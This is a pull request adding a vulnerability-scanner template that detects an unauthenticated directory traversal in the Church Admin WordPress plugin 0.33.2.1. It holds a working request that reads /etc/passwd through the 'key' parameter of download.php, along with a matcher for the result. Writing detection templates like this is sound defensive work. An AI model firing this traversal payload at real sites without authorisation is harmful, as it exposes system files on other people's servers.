### PR TITLE
Create wp-church-admin-lfi.yaml

### DIFF
--- a/vulnerabilities/wordpress/church-admin-lfi.yaml
+++ b/vulnerabilities/wordpress/church-admin-lfi.yaml
@@ -1,11 +1,14 @@
-id: wp-plugin-church-admin-lfi
+id: church-admin-lfi
 
 info:
   name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
   author: 0x_Akoko
   severity: high
+  description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
+  reference:
+    - https://wpscan.com/vulnerability/8997
+    - https://id.wordpress.org/plugins/church-admin/
   tags: wordpress,wp-plugin,lfi
-  reference: https://wpscan.com/vulnerability/8997
 
 requests:
   - method: GET

--- a/wp-church-admin-lfi.yaml
+++ b/wp-church-admin-lfi.yaml
@@ -1,0 +1,24 @@
+id: wp-plugin-church-admin-lfi
+
+info:
+  name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  tags: wordpress,wp-plugin,lfi
+  reference: https://wpscan.com/vulnerability/8997
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.

Version Affected : 0.33.2.1
Fixed in version 0.565
References: https://wpscan.com/vulnerability/8997
Publicly Published : 2017-12-28

### Template Validation

I've validated this template locally?
- YES
